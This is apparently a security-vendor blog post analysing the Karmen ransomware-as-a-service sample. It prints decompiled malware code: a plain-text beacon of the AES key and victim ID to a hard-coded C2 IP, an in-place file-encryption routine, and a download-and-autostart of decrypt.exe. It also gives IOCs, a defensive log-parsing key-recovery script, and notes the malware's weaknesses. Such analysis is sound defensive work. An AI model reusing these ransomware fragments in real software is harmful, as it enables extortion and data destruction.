Karmen is a new RaaS (Ransomware as a Service) offering on underground forums. According to recent research from Recorded Future, this ransomware is being advertised and sold in a Russian-speaking underground hacking forum at the relatively cheap price of $175.
Karmen was first spotted by MalwareHunter in mid-March. Cyphort currently detects this file as RANSOM_FILECRYPTOR.DC. Cyphort Labs took a deeper look at one sample and uncovered several flaws that make this ransomware less robust than it appears.
File Properties
MD5: 05427ed1c477cc01910eb9adbf35068d
Compilation Time Stamp: Sun Mar 12 07:25:00 2017
The file is a .NET compiled executable. It is neither packed nor obfuscated, so strings and IOCs related to the malware can easily be seen with basic string-checking tools:
Installation
Karmen first generates two random strings: a 30-byte key for its AES encryption and a 15-byte string used as the ID of the infected machine.
private void Form1_Load(object sender, EventArgs e)
{
string text = this.gen(30);
string text2 = this.gen(15);
new WebClient().DownloadString("http://91.223.123.78/data.php?id=" + text2 + "&key=" + text);
this.ldf(text);
this.Inf(text2);
Application.Exit();
}
It then sends the AES key and the ID to a hard-coded IP address, 91.223.123.78, via HTTP. The communication is neither encrypted nor obfuscated, so anyone who intercepts the network traffic can obtain the encryption key. This is probably why Karmen advertises that it will delete the decryption module if an analysis environment is detected.
Encryption
After sending the key and ID to its C2 server, it enumerates all logical drives and starts encrypting all files with the following extensions:
.sql .css .docx .csv .js .exl .zip .txt .kdbx .mdbackup .pdf .kdb .syncdb .doc
It uses a basic AES-256 encryption routine; the generated 30-byte key string is first hashed with SHA-256 to produce the actual AES key.
public void enf(string file, string pwd)
{
// Read the whole file, derive the AES key as SHA-256 of the key string,
// encrypt in place, then append the .grt marker extension.
byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
byte[] array = Encoding.UTF8.GetBytes(pwd);
array = SHA256.Create().ComputeHash(array);
byte[] bytes = this.AES_Encrypt(bytesToBeEncrypted, array);
File.WriteAllBytes(file, bytes);
File.Move(file, file + ".grt");
}
Once a file is encrypted, the “.grt” extension is appended to the original file name. The malware uses this as a marker for encrypted files, and it is a good indicator that a machine is infected with the Karmen ransomware.
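As an added example (not part of the Cyphort analysis), the following Python script shows how a responder could pull the victim ID and key string out of captured proxy logs of the plain-text beacon described under Installation, and derive the same SHA-256 AES key that enf() uses. The log lines, client addresses and ID/key values are constructed, and the log line format is an assumption.

```python
import hashlib
from urllib.parse import parse_qs, urlparse

C2_HOST = "91.223.123.78"  # hard-coded in the analyzed sample
C2_PATHS = {"/data.php", "/decrypt.exe", "/btc.php", "/adr.php", "/check.php"}

# Constructed proxy log ("<ts> <client> <method> <url>"), not real traffic:
# the Form1_Load beacon, two Inf() downloads, lookalike noise, a decryptor poll.
SAMPLE_LOG = """\
2017-03-14T10:02:11Z 10.0.0.7 GET http://91.223.123.78/data.php?id=Qm3xT8vLp0Zk9sW&key=aB3dE6fG9hJ2kL5mN8pQ1rS4tU7vW0
2017-03-14T10:02:12Z 10.0.0.7 GET http://91.223.123.78/decrypt.exe
2017-03-14T10:02:13Z 10.0.0.7 GET http://91.223.123.78/btc.php?id=Qm3xT8vLp0Zk9sW
2017-03-14T10:02:14Z 10.0.0.7 GET http://example.org/data.php?id=foo&key=bar
2017-03-14T10:05:00Z 10.0.0.9 GET http://91.223.123.78/check.php?id=Qm3xT8vLp0Zk9sW
"""

def parse_line(line):
    """Return (client, parsed_url) for one log line, or None if malformed."""
    parts = line.split()
    return (parts[1], urlparse(parts[3])) if len(parts) == 4 else None

def karmen_events(log_text):
    """Every (client, path) request to the C2 host on a known Karmen path."""
    events = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed and parsed[1].hostname == C2_HOST and parsed[1].path in C2_PATHS:
            events.append((parsed[0], parsed[1].path))
    return events

def derive_aes_key(pwd):
    """Mirror enf(): the AES key is SHA-256 over the UTF-8 bytes of the key string."""
    return hashlib.sha256(pwd.encode("utf-8")).digest()

def recover_keys(log_text):
    """Map victim id -> details from data.php beacons; well_formed = 15-char id and 30-char key."""
    found = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if not parsed or parsed[1].hostname != C2_HOST or parsed[1].path != "/data.php":
            continue
        qs = parse_qs(parsed[1].query)
        if "id" not in qs or "key" not in qs:
            continue
        vid, pwd = qs["id"][0], qs["key"][0]
        found[vid] = {"client": parsed[0], "password": pwd,
                      "aes_key_hex": derive_aes_key(pwd).hex(),
                      "well_formed": len(vid) == 15 and len(pwd) == 30}
    return found
```

The recovered id matches the contents of %temp%\id.txt on the infected host, and the derived 32-byte key is what a HiddenTear-style decryption tool would need as input.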
Decryptor
It then downloads another executable, decrypt.exe, from the same C2 server and creates an autostart entry for it. This is most likely the decryptor tool. Alongside it, the malware fetches additional data from the C2 and creates the following components in the %temp% folder:
Id.txt
lnk.txt
btc.txt
adr.txt
del.bat
public void Inf(string id)
{
WebClient webClient = new WebClient();
string text = "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\";
webClient.DownloadFile(new Uri("http://91.223.123.78/decrypt.exe"), text + "decrypt.exe");
RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
try
{
registryKey.SetValue("DecryptFiles", text + "decrypt.exe");
registryKey.Close();
}
catch
{
}
this.CreateFile(text, "id.txt", id);
this.CreateFile(text, "lnk.txt", "http://91.223.123.78/");
this.CreateFile(text, "btc.txt", this.GetFile("http://91.223.123.78/btc.php?id=" + id));
this.CreateFile(text, "adr.txt", this.GetFile("http://91.223.123.78/adr.php?id=" + id));
string[] contents = new string[]
{
"@echo off",
"taskkill /f /im decrypt.exe",
"del " + text + "decrypt.exe",
"del " + text + "lnk.txt",
"del " + text + "btc.txt",
"del " + text + "adr.txt",
"del " + text + "del.bat"
};
File.WriteAllLines(text + "del.bat", contents);
Process.Start(text + "decrypt.exe");
}
At the time of our analysis the C2 server was down, so we were not able to get a copy of the decryptor code. Based on the code we saw, however, we believe the decryptor runs in the background waiting for a signal from the C2 server to start decrypting once the ransom is paid.
We were, however, able to obtain a different variant of decrypt.exe. This one was downloaded from a different domain, so it seems this malware is now active in the wild.
MD5: 1ea26d0af5da76110e248da85656a184
It received very few detections from AVs on its first submission to VirusTotal.
Cyphort currently detects this file as RANSOM_HIDDENTEAR.DC.
When executed, the malware displays the following window, which has no close or exit button. It also offers a choice between German and English, which gives an idea of the author’s targets.
The decryptor first checks whether the machine contains the file %temp%\id.txt, which holds the ID of the infected user; if the file is not found, the decryptor simply deletes itself.
If the file exists, it connects to its C2 server with the ID to get the decryption key:
public void Check(string id, string lnk)
{
// Poll check.php with the victim ID; a response longer than 25 characters is treated as the key.
string text = this.inf(lnk + "check.php?id=" + id);
bool flag = text.Length > 25;
if (flag)
{
this.timer1.Enabled = false;
this.fDD(text);
}
}
The server decides whether to return the key, most likely based on whether the user has paid the ransom. The decryptor expects the key to be longer than 25 bytes; if that condition is satisfied, it proceeds with the decryption process using the obtained key.
Karmen’s Weaknesses
Weak Key Management and Symmetric Encryption
Karmen uses the typical AES-256 encryption, which could be brute forced. Aside from this, it exposes the key by sending it to the C2 server in plain text, so anyone who has captured the network traffic can easily recover the key. Because it is based on HiddenTear (an open-source ransomware), some have already created a decryption tool for this ransomware.
Not Deleting Backups
The ransomware also fails to delete backups such as shadow copies, which gives infected users hope of recovering simply by restoring the shadow copies.
Final Thoughts
The malware we analyzed is probably a light or early version of Karmen RaaS. We were not able to identify a sample that detects a sandbox or analysis tools as advertised in the underground forum. How the malware is distributed is currently unknown, but we believe some of it is already in the wild. Despite being a cheap and working service, we found several weaknesses in Karmen. Given the way the encryption is implemented, we believe the authors are probably new to the ransomware field. Having said that, any ransomware is still a dangerous threat and is always painful for those infected.
Special thanks to Joe Dela Cruz and the rest of Cyphort Labs team for their help with the analysis.
The post Karmen Ransomware-as-a-Service flawed appeared first on Cyphort.